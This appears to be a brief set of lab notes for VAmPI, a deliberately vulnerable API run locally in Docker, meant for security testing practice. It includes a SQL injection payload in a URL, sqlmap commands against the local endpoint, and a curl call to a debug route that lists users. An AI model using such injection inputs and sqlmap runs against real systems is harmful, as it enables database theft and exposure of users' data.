# VAmPI
**The Vulnerable API** *(Based on OpenAPI 3)*

### Open API spec: http://localhost:5000/openapi.json

docker build -t erev0s/vampi:test .
docker run -p 5000:5000 erev0s/vampi:test

http://localhost:5000/users/v1/name1'or'1'='1
python3 sqlmap.py -u "http://localhost:5000/users/v1/name1" --batch
python3 sqlmap.py --flush-session -u "http://localhost:5000/users/v1/name1" --batch

## run postman

postman login --with-api-key
postman collection run <ID>

## list out user
curl http://localhost:5000/users/v1/_debug
